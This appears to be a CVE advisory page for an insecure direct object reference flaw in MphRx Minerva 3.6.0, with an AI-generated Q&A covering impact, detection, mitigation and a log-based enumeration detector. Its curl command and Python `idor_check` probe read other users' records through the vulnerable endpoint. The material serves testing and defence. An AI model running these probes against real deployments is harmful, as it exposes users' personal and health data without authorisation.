CVE-2026-5780
IDOR Vulnerability in MphRx Minerva V3.6.0 Enables User Data Exposure
Publication date: 2026-04-28
Last updated on: 2026-05-05
Assigner: Spanish National Cybersecurity Institute, S.A. (INCIBE)
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| agilonhealth | minerva | 3.6.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5780 is an insecure direct object reference (IDOR) vulnerability in MphRx Minerva version 3.6.0. It affects the endpoint `/minerva/moUser/show/<ID>`: the server returns the user record identified by the numeric ID in the URL without checking that the record belongs to the authenticated caller. Any logged-in user can therefore read other registered users' data simply by changing the ID in the request.
By iterating over the ID value, an authenticated attacker can enumerate registered users and retrieve their associated data without authorization, bypassing the application's access controls.
How can this vulnerability impact me?
This vulnerability can lead to unauthorized disclosure of sensitive user information. An attacker who is authenticated can access other users' data by modifying the user ID in requests, potentially exposing personal or confidential information.
Such unauthorized access can compromise user privacy, damage trust, and may lead to further exploitation depending on the nature of the exposed data.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability allows an authenticated user to access data of other registered users without proper authorization by modifying the user ID. This improper access control can lead to unauthorized disclosure of personal or sensitive information.
Such unauthorized access to user data can negatively impact compliance with data protection regulations like GDPR and HIPAA, which require strict controls to protect personal and health information from unauthorized access and disclosure.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the endpoint `/minerva/moUser/show/<ID>` for insecure direct object references: authenticate as one user and request the record of another. Use two accounts you control (test accounts) so that the check does not itself read real users' data.
A practical approach is to use an HTTP client such as curl or Postman to send authenticated requests to the endpoint with different user IDs and observe whether data belonging to other users is returned.
Example curl command (replace <TOKEN> with a valid authentication token for the first account and <ID> with the second account's user ID; if your deployment authenticates with a session cookie rather than a bearer token, pass the cookie with `-b` instead of the Authorization header):

```sh
curl -H "Authorization: Bearer <TOKEN>" https://<target-domain>/minerva/moUser/show/<ID>
```

If the response returns the other user's data with a 200 status instead of an authorization error (401 or 403), the vulnerability is present. Confirm first that the same request for your own ID succeeds, so that a 403 on the other ID is a genuine access-control decision and not simply an invalid token.
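As an added example (not code from the advisory or from MphRx), the following Python script runs the same check against a small in-process mock of the endpoint, so it can be tried offline. The mock, its two user records, the `Bearer` token scheme and the JSON response shape are assumptions for illustration; a real Minerva deployment may authenticate with a session cookie and return HTML. The probe logic in `idor_check` is what you would point at a test instance: confirm that the caller's own record is readable, then request a second test account's record and treat a 200 carrying that user's data as a positive. The `enforce_ownership` flag in the mock shows what the response looks like once the server compares the requested ID with the caller.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

ENDPOINT = "/minerva/moUser/show/"

# Constructed sample data (not real Minerva accounts): two users and the
# token that authenticates each of them. Admin IDs may read any record.
USERS = {
    101: {"id": 101, "username": "alice", "email": "alice@example.test"},
    102: {"id": 102, "username": "bob", "email": "bob@example.test"},
}
TOKENS = {"tok-alice": 101, "tok-bob": 102}
ADMIN_IDS = set()


def make_handler(enforce_ownership):
    """Handler mimicking the vulnerable endpoint (False) or one with the
    ownership check the mitigation section asks for (True). Assumed shape."""

    class Handler(BaseHTTPRequestHandler):
        def log_message(self, *args):  # keep the demo quiet
            pass

        def _send(self, code, body):
            data = json.dumps(body).encode()
            self.send_response(code)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def do_GET(self):
            if not self.path.startswith(ENDPOINT):
                return self._send(404, {"error": "not found"})
            auth = self.headers.get("Authorization", "")
            token = auth[len("Bearer "):] if auth.startswith("Bearer ") else ""
            caller = TOKENS.get(token)
            if caller is None:
                return self._send(401, {"error": "unauthenticated"})
            try:
                target = int(self.path[len(ENDPOINT):])
            except ValueError:
                return self._send(400, {"error": "bad id"})
            # The missing check: the vulnerable variant looks the record up by
            # the URL ID alone and never compares it with the caller.
            if enforce_ownership and target != caller and caller not in ADMIN_IDS:
                return self._send(403, {"error": "forbidden"})
            record = USERS.get(target)
            if record is None:
                return self._send(404, {"error": "no such user"})
            return self._send(200, record)

    return Handler


def serve(enforce_ownership):
    """Start the mock on a free loopback port; returns the server object."""
    srv = HTTPServer(("127.0.0.1", 0), make_handler(enforce_ownership))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(base_url, token, user_id):
    """GET /minerva/moUser/show/<user_id> as `token`; returns (status, json or None)."""
    req = Request(f"{base_url}{ENDPOINT}{user_id}",
                  headers={"Authorization": f"Bearer {token}"})
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read())
    except HTTPError as err:
        return err.code, None


def idor_check(base_url, token, own_id, other_id):
    """True if a token for own_id can read other_id's record (IDOR present).
    The baseline request for the caller's own record must succeed first;
    otherwise a 403 on the other ID proves nothing (the token may be invalid)."""
    own_status, _ = fetch(base_url, token, own_id)
    if own_status != 200:
        raise RuntimeError(f"baseline request returned {own_status}; check the token")
    other_status, body = fetch(base_url, token, other_id)
    return other_status == 200 and body is not None and body.get("id") == other_id


def demo():
    """Run the probe against both mock variants."""
    results = {}
    for label, enforce in (("vulnerable", False), ("hardened", True)):
        srv = serve(enforce)
        base_url = f"http://127.0.0.1:{srv.server_port}"
        results[label] = idor_check(base_url, "tok-alice", 101, 102)
        srv.shutdown()
        srv.server_close()
    return results


if __name__ == "__main__":
    print(demo())  # {'vulnerable': True, 'hardened': False}
```

Against a real instance, replace the mock with the target's base URL and keep only `fetch` and `idor_check`; the baseline request guards against a false negative when the token has expired or the endpoint path differs in your deployment.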
What immediate steps should I take to mitigate this vulnerability?
No official solution or patch has been reported yet for this vulnerability.
Immediate mitigation steps include:
- Restrict access to the vulnerable endpoint `/minerva/moUser/show/<ID>` to only highly trusted users or administrators.
- Implement the missing access control check on the server side: before returning a record, compare the ID in the URL with the authenticated user's own ID and reject the request (403) unless they match or the caller holds an administrative role.
- Monitor and log access to the endpoint to detect any suspicious activity or unauthorized access attempts.
- Consider temporarily disabling the endpoint if possible until a patch or fix is available.
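For the monitoring step above, an added example (not from the advisory or from MphRx) of the detection logic a SOC could run over web-server access logs for the endpoint: it flags any principal that successfully reads more than a handful of distinct `/minerva/moUser/show/<ID>` records within a short window, which is what ID enumeration looks like and what a normal user viewing their own profile does not do. The combined-style log format, the presence of the authenticated username in the third field, the five-minute window and the threshold of five IDs are assumptions; adjust them to your proxy's log format and to the number of records a legitimate workflow touches. The sample log lines are constructed.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Assumed combined-style access log with the authenticated user in the third
# field. When that field is "-" (proxy does not record it), fall back to the
# client IP as the principal.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SHOW_RE = re.compile(r'^/minerva/moUser/show/(?P<id>\d+)(?:[/?]|$)')


def parse_line(line):
    """Return (principal, timestamp, user_id, status) for a moUser/show hit, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    p = SHOW_RE.match(m["path"])
    if not p:
        return None
    principal = m["user"] if m["user"] != "-" else m["ip"]
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return principal, ts, int(p["id"]), int(m["status"])


def find_enumeration(lines, window=timedelta(minutes=5), min_distinct=5):
    """Flag principals that successfully read at least `min_distinct` distinct
    user records inside any span of length `window`.
    Returns {principal: largest number of distinct IDs seen in one window}."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[3] == 200:      # only successful reads count
            principal, ts, uid, _ = parsed
            hits[principal].append((ts, uid))
    alerts = {}
    for principal, events in hits.items():
        events.sort()
        recent = deque()                     # (ts, uid) inside the window
        in_window = Counter()                # uid -> occurrences in window
        best = 0
        for ts, uid in events:
            recent.append((ts, uid))
            in_window[uid] += 1
            while ts - recent[0][0] > window:  # evict events older than window
                _, old_uid = recent.popleft()
                in_window[old_uid] -= 1
                if in_window[old_uid] == 0:
                    del in_window[old_uid]
            best = max(best, len(in_window))
        if best >= min_distinct:
            alerts[principal] = best
    return alerts


# Constructed sample log: alice and bob each view their own record, mallory
# walks IDs 103-110 in 40 seconds (plus one 403 that must not count), and an
# unattributed client reads one record.
SAMPLE_LOG = [
    '10.0.0.5 - alice [28/Apr/2026:10:00:01 +0000] "GET /minerva/moUser/show/101 HTTP/1.1" 200 512',
    '10.0.0.6 - bob [28/Apr/2026:10:00:09 +0000] "GET /minerva/moUser/show/102 HTTP/1.1" 200 498',
    '10.0.0.9 - mallory [28/Apr/2026:10:05:45 +0000] "GET /minerva/moUser/show/111 HTTP/1.1" 403 41',
    '10.0.0.7 - - [28/Apr/2026:10:06:00 +0000] "GET /minerva/moUser/show/105 HTTP/1.1" 200 503',
]
SAMPLE_LOG += [
    f'10.0.0.9 - mallory [28/Apr/2026:10:05:{5 * i:02d} +0000] '
    f'"GET /minerva/moUser/show/{103 + i} HTTP/1.1" 200 501'
    for i in range(8)
]

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))  # {'mallory': 8}
```

Counting only 200 responses keeps the rule focused on data that actually left the server; a separate, lower-threshold rule on 403s is worth adding once the ownership check is in place, since after the fix a burst of 403s on this path is the same enumeration attempt failing.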